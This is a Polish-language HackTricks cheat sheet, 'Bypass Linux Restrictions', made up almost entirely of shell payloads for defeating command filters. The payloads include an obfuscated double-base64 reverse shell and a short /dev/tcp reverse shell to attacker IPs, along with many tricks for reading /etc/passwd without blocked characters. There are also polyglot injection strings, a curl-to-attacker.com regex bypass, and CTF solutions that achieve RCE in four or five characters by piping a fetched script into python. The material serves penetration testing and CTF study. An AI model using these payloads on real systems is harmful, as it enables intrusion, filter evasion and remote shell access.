Bypass Linux Restrictions

Zacznij od zera i opanuj hakowanie AWS dzięki htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Użyj Trickest, aby łatwo tworzyć i automatyzować przepływy pracy zasilane przez najbardziej zaawansowane narzędzia społecznościowe na świecie. Otrzymaj Dostęp Dziś:

Ominięcia Powszechnych Ograniczeń

Powłoka Odwrócona

# Double-Base64 is a great way to avoid bad characters like +, works 99% of the time
echo "echo $(echo 'bash -i >& /dev/tcp/10.10.14.8/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
# echo${IFS}WW1GemFDQXRhU0ErSmlBdlpHVjJMM1JqY0M4eE1DNHhNQzR4TkM0NEx6UTBORFFnTUQ0bU1Rbz0K|ba''se''6''4${IFS}-''d|ba''se''64${IFS}-''d|b''a''s''h

Krótka powłoka odwrotna

#Trick from Dikline
#Get a rev shell with
(sh)0>/dev/tcp/10.10.10.10/443
#Then get the out of the rev shell executing inside of it:
exec >&0

Ominięcie ścieżek i zakazanych słów

# Question mark binary substitution
/usr/bin/p?ng # /usr/bin/ping
nma? -p 80 localhost # /usr/bin/nmap -p 80 localhost

# Wildcard(*) binary substitution
/usr/bin/who*mi # /usr/bin/whoami

# Wildcard + local directory arguments
touch -- -la # -- stops processing options after the --
ls *
echo * #List current files and folders with echo and wildcard

# [chars]
/usr/bin/n[c] # /usr/bin/nc

# Quotes
'p'i'n'g # ping
"w"h"o"a"m"i # whoami
ech''o test # echo test
ech""o test # echo test
bas''e64 # base64

#Backslashes
\u\n\a\m\e \-\a # uname -a
/\b\i\n/////s\h

# $@
who$@ami #whoami

# Transformations (case, reverse, base64)
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi") #whoami -> Upper case to lower case
$(a="WhOaMi";printf %s "${a,,}") #whoami -> transformation (only bash)
$(rev<<<'imaohw') #whoami
bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) #base64


# Execution through $0
echo whoami|$0

# Uninitialized variables: A uninitialized variable equals to null (nothing)
cat$u /etc$u/passwd$u # Use the uninitialized variable without {} before any symbol
p${u}i${u}n${u}g # Equals to ping, use {} to put the uninitialized variables between valid characters

# Fake commands
p$(u)i$(u)n$(u)g # Equals to ping but 3 errors trying to execute "u" are shown
w`u`h`u`o`u`a`u`m`u`i # Equals to whoami but 5 errors trying to execute "u" are shown

# Concatenation of strings using history
!-1 # This will be substitute by the last command executed, and !-2 by the penultimate command
mi # This will throw an error
whoa # This will throw an error
!-1!-2 # This will execute whoami

Ominięcie zakazanych spacji

# {form}
{cat,lol.txt} # cat lol.txt
{echo,test} # echo test

# IFS - Internal field separator, change " " for any other character ("]" in this case)
cat${IFS}/etc/passwd # cat /etc/passwd
cat$IFS/etc/passwd # cat /etc/passwd

# Put the command line in a variable and then execute it
IFS=];b=wget]10.10.14.21:53/lol]-P]/tmp;$b
IFS=];b=cat]/etc/passwd;$b # Using 2 ";"
IFS=,;`cat<<<cat,/etc/passwd` # Using cat twice
#  Other way, just change each space for ${IFS}
echo${IFS}test

# Using hex format
X=$'cat\x20/etc/passwd'&&$X

# Using tabs
echo "ls\x09-l" | bash

# New lines
p\
i\
n\
g # These 4 lines will equal to ping

# Undefined variables and !
$u $u # This will be saved in the history and can be used as a space, please notice that the $u variable is undefined
uname!-1\-a # This equals to uname -a

Ominięcie ukośnika i ukośnika odwrotnego

cat ${HOME:0:1}etc${HOME:0:1}passwd
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

Ominięcie potoków

bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)

Ominięcie za pomocą kodowania szesnastkowego

echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`

Ominięcie blokady IP

# Decimal IPs
127.0.0.1 == 2130706433

Czasowa ekstrakcja danych

time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi

Pobieranie znaków z zmiennych środowiskowych

echo ${LS_COLORS:10:1} #;
echo ${PATH:0:1} #/

Wyciek danych DNS

Możesz na przykład użyć burpcollab lub pingb.

Wbudowane funkcje

W przypadku gdy nie możesz wykonać zewnętrznych funkcji i masz dostęp jedynie do ograniczonego zestawu wbudowanych funkcji do uzyskania RCE, istnieją przydatne sztuczki pozwalające to zrobić. Zazwyczaj nie będziesz w stanie użyć wszystkich wbudowanych funkcji, dlatego powinieneś znać wszystkie dostępne opcje, aby próbować ominąć więzienie. Pomysł pochodzi od devploit. Po pierwsze sprawdź wszystkie wbudowane funkcje powłoki. Następnie oto kilka zaleceń:

# Get list of builtins
declare builtins

# In these cases PATH won't be set, so you can try to set it
PATH="/bin" /bin/ls
export PATH="/bin"
declare PATH="/bin"
SHELL=/bin/bash

# Hex
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")
$(echo -e "\x2f\x62\x69\x6e\x2f\x6c\x73")

# Input
read aaa; exec $aaa #Read more commands to execute and execute them
read aaa; eval $aaa

# Get "/" char using printf and env vars
printf %.1s "$PWD"
## Execute /bin/ls
$(printf %.1s "$PWD")bin$(printf %.1s "$PWD")ls
## To get several letters you can use a combination of printf and
declare
declare functions
declare historywords

# Read flag in current dir
source f*
flag.txt:1: command not found: CTF{asdasdasd}

# Read file with read
while read -r line; do echo $line; done < /etc/passwd

# Get env variables
declare

# Get history
history
declare history
declare historywords

# Disable special builtins chars so you can abuse them as scripts
[ #[: ']' expected
## Disable "[" as builtin and enable it as script
enable -n [
echo -e '#!/bin/bash\necho "hello!"' > /tmp/[
chmod +x [
export PATH=/tmp:$PATH
if [ "a" ]; then echo 1; fi # Will print hello!

Wielojęzyczne wstrzykiwanie poleceń

1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/

Ominięcie potencjalnych wyrażeń regularnych

# A regex that only allow letters and numbers might be vulnerable to new line characters
1%0a`curl http://attacker.com`

Bashfuscator

# From https://github.com/Bashfuscator/Bashfuscator
./bashfuscator -c 'cat /etc/passwd'

RCE z 5 znakami

# From the Organge Tsai BabyFirst Revenge challenge: https://github.com/orangetw/My-CTF-Web-Challenges#babyfirst-revenge
#Oragnge Tsai solution
## Step 1: generate `ls -t>g` to file "_" to be able to execute ls ordening names by cration date
http://host/?cmd=>ls\
http://host/?cmd=ls>_
http://host/?cmd=>\ \
http://host/?cmd=>-t\
http://host/?cmd=>\>g
http://host/?cmd=ls>>_

## Step2: generate `curl orange.tw|python` to file "g"
## by creating the necesary filenames and writting that content to file "g" executing the previous generated file
http://host/?cmd=>on
http://host/?cmd=>th\
http://host/?cmd=>py\
http://host/?cmd=>\|\
http://host/?cmd=>tw\
http://host/?cmd=>e.\
http://host/?cmd=>ng\
http://host/?cmd=>ra\
http://host/?cmd=>o\
http://host/?cmd=>\ \
http://host/?cmd=>rl\
http://host/?cmd=>cu\
http://host/?cmd=sh _
# Note that a "\" char is added at the end of each filename because "ls" will add a new line between filenames whenwritting to the file

## Finally execute the file "g"
http://host/?cmd=sh g


# Another solution from https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
# Instead of writing scripts to a file, create an alphabetically ordered the command and execute it with "*"
https://infosec.rm-it.de/2017/11/06/hitcon-2017-ctf-babyfirst-revenge/
## Execute tar command over a folder
http://52.199.204.34/?cmd=>tar
http://52.199.204.34/?cmd=>zcf
http://52.199.204.34/?cmd=>zzz
http://52.199.204.34/?cmd=*%20/h*

# Another curiosity if you can read files of the current folder
ln /f*
## If there is a file /flag.txt that will create a hard link
## to it in the current folder

RCE z 4 znakami

# In a similar fashion to the previous bypass this one just need 4 chars to execute commands
# it will follow the same principle of creating the command `ls -t>g` in a file
# and then generate the full command in filenames
# generate "g> ht- sl" to file "v"
'>dir'
'>sl'
'>g\>'
'>ht-'
'*>v'

# reverse file "v" to file "x", content "ls -th >g"
'>rev'
'*v>x'

# generate "curl orange.tw|python;"
'>\;\\'
'>on\\'
'>th\\'
'>py\\'
'>\|\\'
'>tw\\'
'>e.\\'
'>ng\\'
'>ra\\'
'>o\\'
'>\ \\'
'>rl\\'
'>cu\\'

# got shell
'sh x'
'sh g'

Bypass ochrony tylko do odczytu/Noexec/Distroless

Jeśli znajdujesz się w systemie plików z ochroną tylko do odczytu i noexec lub nawet w kontenerze distroless, istnieją nadal sposoby na wykonywanie dowolnych binarnych plików, nawet powłoki!:

pageBypass FS protections: read-only / no-exec / Distroless

Bypass Chroot i innych więzień

pageEscaping from Jails

Odnośniki i Więcej

Użyj Trickest, aby łatwo tworzyć i automatyzować zadania przy użyciu najbardziej zaawansowanych narzędzi społeczności. Otrzymaj Dostęp Dziś:

Zacznij od zera i zostań ekspertem AWS w dziedzinie hakerskiej z htARTE (HackTricks AWS Red Team Expert)!

Inne sposoby wsparcia HackTricks:

Last updated